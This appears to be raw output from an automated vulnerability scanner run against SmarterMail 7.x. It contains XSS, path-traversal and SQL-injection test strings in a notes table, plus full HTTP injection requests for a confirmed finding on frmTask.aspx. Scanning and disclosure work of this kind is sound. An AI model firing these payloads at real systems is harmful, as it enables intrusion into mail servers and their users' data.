<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTA4NGNjOTg1YTc0NDk4MWFlMjRiYzBiNDdkY2EyZWQ-" name="ctl00_MPH_HyperGrid1_CB64_MTA4NGNjOTg1YTc0NDk4MWFlMjRiYzBiNDdkY2EyZWQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NjAxZGY1YWMzOWM1NGYxZGFlMjk5NmE4ZGNhMGNiNzk-" name="ctl00_MPH_HyperGrid1_CB64_NjAxZGY1YWMzOWM1NGYxZGFlMjk5NmE4ZGNhMGNiNzk-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x005DC0)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YTMzY2YxNDgyNDBlNGNmYzk0ZTY3ZTczOWNiY2U1ZDg-" name="ctl00_MPH_HyperGrid1_CB64_YTMzY2YxNDgyNDBlNGNmYzk0ZTY3ZTczOWNiY2U1ZDg-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">3</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MWVlOGFlMzNhYmIxNDcxZDhlYjg1YjkyYjYxYWUzZmE-" name="ctl00_MPH_HyperGrid1_CB64_MWVlOGFlMzNhYmIxNDcxZDhlYjg1YjkyYjYxYWUzZmE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">../../../../../CANTBEHERE/../../../../../etc/httpd/logs/error.log</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NGE5YjdmOThjMTBiNDdkNTljZDYwZWYxODRmODFiMzE-" name="ctl00_MPH_HyperGrid1_CB64_NGE5YjdmOThjMTBiNDdkNTljZDYwZWYxODRmODFiMzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">-111 OR SLEEP(25)=0 LIMIT 1-- </td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NWQyYjViYzg2N2RlNDdhZGJlZWRlMTRlZTU3MDM5NGQ-" name="ctl00_MPH_HyperGrid1_CB64_NWQyYjViYzg2N2RlNDdhZGJlZWRlMTRlZTU3MDM5NGQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1 OR X='ss</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWY5Y2Q4YmUwZjIyNDhjNzk0YjhjOTA4MWI1MGU4NmI-" name="ctl00_MPH_HyperGrid1_CB64_ZWY5Y2Q4YmUwZjIyNDhjNzk0YjhjOTA4MWI1MGU4NmI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzQ5YTU4YmIxNDU4NDllNThhNDVmZjczNDIzMTljY2Q-" name="ctl00_MPH_HyperGrid1_CB64_MzQ5YTU4YmIxNDU4NDllNThhNDVmZjczNDIzMTljY2Q-" /></td><td class="SmallImage"><table class="NoteColor" cellSpac..
- /Main/frmTask.aspx

/Main/frmTask.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmTask.aspx?mapped=false&user=dummy&popup=true&nsextt=//example.com/netsp..

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx

Injection Request

POST /Main/frmPopupContactCategories.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=ctl00%24BrPH%24OKImageButton&__EVENTARGUMENT=1&__VIEWSTATE=%2fwEPDwUKLTE1MzIwNjc1OQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgMPZBYCZg9kFgJmDw8WBB4IQ3NzQ2xhc3MFDkluZGVudCBTZXR0aW5nHgRfIVNCAgJkFgICAw8PFgIfA2VkZGTYbBeYmpPfD5OfkuIOw4oB9USDxQ%3d%3d&ctl00%24MPH%24txtCategories_SettingText=%3cscript%3ens(0x005CD1)%3c%2fscript%3e

Identification Request

POST /Main/frmTask.aspx?mapped=false&user=dummy&popup=true&nsextt=//example.com/netsparker0x006D10.css HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmTask.aspx?mapped=false&user=dummy&popup=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 19319
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__VIEWSTATE=%2fwEPDwUJMTA0NjI1MzI3DxYGHghfX19UaXRsZQUITXkgVGFza3MeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgwCAg9kFgICAQ8WAh4HVmlzaWJsZWhkAgMPZBYEAgEPZBYCAgUPDxYCHwNoZGQCAw9kFgICAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFD3dpbmRvdy5jbG9zZSgpO2RkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ9kFgJmD2QWAgIDD2QWBgICD2QWAgIBD2QWDgIBDw8WAh8DaGQWBGYPDxYGHghDc3NDbGFzcwUMSW5kZW50IEZpeGVkHwcFDFJlbGF0ZWQgSXRlbR4EXyFTQgICZGQCAQ8PFgQfCAUIIFNldHRpbmcfCQICZGQCAg9kFgICAQ9kFgJmD2QWAmYPZBYCZg9kFgRmDw8WEB4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeB01heERhdGUGAADbmXo%2fMQkfCQICHgxTZWxlY3RlZERhdGUGwPeK80owzUgfCAUWRGF0ZVRpbWVQaWNrZXJPdmVycmlkZR4HTWluRGF0ZQYAQFcgUwVRCGQWCmYPFCsACA8WGB8KaB4NT3JpZ2luYWxWYWx1ZQUUMTAvMi8yMDEwIDE6MTU6MDAgUE0fC2gfDAUMU21hcnRlclRvb2xzHgxBdXRvUG9zdEJhY2tnHgpEYXRlRm9ybWF0BQFnHhFEaXNwbGF5RGF0ZUZvcm1hdAUBZx8HBRMyMDEwLTEwLTAyLTEzLTE1LTAwHg1MYWJlbENzc0NsYXNzBQdyaUxhYmVsHhdFbmFibGVBamF4U2tpblJlbmRlcmluZ2gfDQYAANuZej8xCR8PBgBAVyBTBVEIZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfCAURcmlUZXh0Qm94IHJpSG92ZXIfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFEXJpVGV4dEJveCByaUVycm9yHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRNyaVRleHRCb3ggcmlGb2N1c2VkHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRNyaVRleHRCb3ggcmlFbmFibGVkHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8JAoICFgYfFhsAAAAAAABZQAcAAAAfCAURcmlUZXh0Qm94IHJpRW1wdHkfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFEHJpVGV4dEJveCByaVJlYWQfCQKCAmQCAQ8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawVLcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9TdGFydERhdGVQaWNrZXJfU2V0dGluZ1RleHQnKSwnY2FsJyk7ZAICDxQrAA0PFhoFFkZhc3ROYXZpZ2F0aW9uUHJldlRleHRlBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBRFFbmFibGVNdWx0aVNlbGVjdGgFD1JlbmRlckludmlzaWJsZWcFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUSTmF2aWdhdGlvbk5leHRUZXh0ZQUETWluRAYAQFcgUwVRCAUDRVJTaAUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFEk5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1heEQGAADbmXo%2fMQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxVoZGQWBB8IBQtyY01haW5UYWJsZR8JAgIWBB8IBQxyY090aGVyTW9udGgfCQICZBYEHwgFCnJjU2VsZWN0ZWQfCQICZBYEHwgFCnJjRGlzYWJsZWQfCQICFgQfCAUMcmNPdXRPZlJhbmdlHwkCAhYEHwgFCXJjV2Vla2VuZB8JAgIWBB8IBQdyY0hvdmVyHwkCAhYEHwgFNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8JAgIWBB8IBQlyY1ZpZXdTZWwfCQICZAIDDw8WBB8XBS0vQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9VcGNvbWluZy5naWYfGAUtL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvVXBjb21pbmcuZ2lmFgIfGQVMcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9TdGFydERhdGVQaWNrZXJfU2V0dGluZ1RleHQnKSwndGltZScpO2QCBA8UKwACDxYOHglTdGFydFRpbWUoKVxTeXN0ZW0uVGltZVNwYW4sIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQgwNzowMDowMB4HRW5kVGltZSgrBAgxOTowMDowMB4ISW50ZXJ2YWwoKwQIMDA6MTU6MDAfCmgfC2gfDAUMU21hcnRlclRvb2xzHxVoZBYEHwgFB3JjSG92ZXIfCQICFgJmDxQrAAkPFgYeDVJlcGVhdENvbHVtbnMCBB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCMGQWBB8IZR8JAgJkFgQfCGUfCQICZGQWBB8IBQhyY0hlYWRlch8JAgIWBB8IBQhyY0Zvb3Rlch8JAgIWBh8WGwAAAAAAQG9AAQAAAB8IBTRSYWRDYWxlbmRhclRpbWVWaWV3IFJhZENhbGVuZGFyVGltZVZpZXdfU21hcnRlclRvb2xzHwkCggIWYAIBD2QWAmYPFgIeCWlubmVyaHRtbAUHNzowMCBBTWQCAg9kFgJmDxYCHyAFBzc6MTUgQU1kAgMPZBYCZg8WAh8gBQc3OjMwIEFNZAIED2QWAmYPFgIfIAUHNzo0NSBBTWQCBQ9kFgJmDxYCHyAFBzg6MDAgQU1kAgYPZBYCZg8WAh8gBQc4OjE1IEFNZAIHD2QWAmYPFgIfIAUHODozMCBBTWQCCA9kFgJmDxYCHyAFBzg6NDUgQU1kAgkPZBYCZg8WAh8gBQc5OjAwIEFNZAIKD2QWAmYPFgIfIAUHOToxNSBBTWQCCw9kFgJmDxYCHyAFBzk6MzAgQU1kAgwPZBYCZg8WAh8gBQc5OjQ1IEFNZAIND2QWAmYPFgIfIAUIMTA6MDAgQU1kAg4PZBYCZg8WAh8gBQgxMDoxNSBBTWQCDw9kFgJmDxYCHyAFCDEwOjMwIEFNZAIQD2QWAmYPFgIfIAUIMTA6NDUgQU1kAhEPZBYCZg8WAh8gBQgxMTowMCBBTWQCEg9kFgJmDxYCHyAFCDExOjE1IEFNZAITD2QWAmYPFgIfIAUIMTE6MzAgQU1kAhQPZBYCZg8WAh8gBQgxMTo0NSBBTWQCFQ9kFgJmDxYCHyAFCDEyOjAwIFBNZAIWD2QWAmYPFgIfIAUIMTI6MTUgUE1kAhcPZBYCZg8WAh8gBQgxMjozMCBQTWQCGA9kFgJmDxYCHyAFCDEyOjQ1IFBNZAIZD2QWAmYPFgIfIAUHMTowMCBQTWQCGg9kFgJmDxYCHyAFBzE6MTUgUE1kAhsPZBYCZg8WAh8gBQcxOjMwIFBNZAIcD2QWAmYPFgIfIAUHMTo0NSBQTWQCHQ9kFgJmDxYCHyAFBzI6MDAgUE1kAh4PZBYCZg8WAh8gBQcyOjE1IFBNZAIfD2QWAmYPFgIfIAUHMjozMCBQTWQCIA9kFgJmDxYCHyAFBzI6NDUgUE1kAiEPZBYCZg8WAh8gBQczOjAwIFBNZAIiD2QWAmYPFgIfIAUHMzoxNSBQTWQCIw9kFgJmDxYCHyAFBzM6MzAgUE1kAiQPZBYCZg8WAh8gBQczOjQ1IFBNZAIlD2QWAmYPFgIfIAUHNDowMCBQTWQCJg9kFgJmDxYCHyAFBzQ6MTUgUE1kAicPZBYCZg8WAh8gBQc0OjMwIFBNZAIoD2QWAmYPFgIfIAUHNDo0NSBQTWQCKQ9kFgJmDxYCHyAFBzU6MDAgUE1kAioPZBYCZg8WAh8gBQc1OjE1IFBNZAIrD2QWAmYPFgIfIAUHNTozMCBQTWQCLA9kFgJmDxYCHyAFBzU6NDUgUE1kAi0PZBYCZg8WAh8gBQc2OjAwIFBNZAIuD2QWAmYPFgIfIAUHNjoxNSBQTWQCLw9kFgJmDxYCHyAFBzY6MzAgUE1kAjAPZBYCZg8WAh8gBQc2OjQ1IFBNZAIBDw8WAh8HBRExMC8yLzIwMTAgMToxNSBQTWRkAgMPZBYCAgEPZBYCZg9kFgJmD2QWAmYPZBYEZg8PFhAfCmgfC2gfDAUMU21hcnRlclRvb2xzHw0GAADbmXo%2fMQkfCQICHw4GwF9PVVMwzUgfCAUWRGF0ZVRpbWVQaWNrZXJPdmVycmlkZR8PBgBAVyBTBVEIZBYKZg8UKwAIDxYYHwpoHxAFFDEwLzIvMjAxMCAyOjE1OjAwIFBNHwtoHwwFDFNtYXJ0ZXJUb29scx8RZx8SBQFnHxMFAWcfBwUTMjAxMC0xMC0wMi0xNC0xNS0wMB8UBQdyaUxhYmVsHxVoHw0GAADbmXo%2fMQkfDwYAQFcgUwVRCGQWBh8WGwAAAAAAAFlABwAAAB8IBRFyaVRleHRCb3ggcmlIb3Zlch8JAoICFgYfFhsAAAAAAABZQAcAAAAfCAURcmlUZXh0Qm94IHJpRXJyb3IfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFE3JpVGV4dEJveCByaUZvY3VzZWQfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFE3JpVGV4dEJveCByaUVuYWJsZWQfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFFHJpVGV4dEJveCByaURpc2FibGVkHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRFyaVRleHRCb3ggcmlFbXB0eR8JAoICFgYfFhsAAAAAAABZQAcAAAAfCAUQcmlUZXh0Qm94IHJpUmVhZB8JAoICZAIBDw8WBB8XBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh8YBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHxkFSXJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dCcpLCdjYWwnKTtkAgIPFCsADQ8WGgUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFEUVuYWJsZU11bHRpU2VsZWN0aAUPUmVuZGVySW52aXNpYmxlZwUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQRNaW5EBgBAVyBTBVEIBQNFUlNoBQ1TZWxlY3RlZERhdGVzDwWPAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkRhdGVUaW1lQ29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUSTmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWF4RAYAANuZej8xCQ8WCB8MBQxTbWFydGVyVG9vbHMfC2gfCmgfFWhkZBYEHwgFC3JjTWFpblRhYmxlHwkCAhYEHwgFDHJjT3RoZXJNb250aB8JAgJkFgQfCAUKcmNTZWxlY3RlZB8JAgJkFgQfCAUKcmNEaXNhYmxlZB8JAgIWBB8IBQxyY091dE9mUmFuZ2UfCQICFgQfCAUJcmNXZWVrZW5kHwkCAhYEHwgFB3JjSG92ZXIfCQICFgQfCAU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHwkCAhYEHwgFCXJjVmlld1NlbB8JAgJkAgMPDxYEHxcFLS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L1VwY29taW5nLmdpZh8YBS0vQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9VcGNvbWluZy5naWYWAh8ZBUpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX0VuZERhdGVQaWNrZXJfU2V0dGluZ1RleHQnKSwndGltZScpO2QCBA8UKwACDxYOHxooKwQIMDc6MDA6MDAfGygrBAgxOTowMDowMB8cKCsECDAwOjE1OjAwHwpoHwtoHwwFDFNtYXJ0ZXJUb29scx8VaGQWBB8IBQdyY0hvdmVyHwkCAhYCZg8UKwAJDxYGHx0CBB8eFgAfHwIwZBYEHwhlHwkCAmQWBB8IZR8JAgJkZBYEHwgFCHJjSGVhZGVyHwkCAhYEHwgFCHJjRm9vdGVyHwkCAhYGHxYbAAAAAABAb0ABAAAAHwgFNFJhZENhbGVuZGFyVG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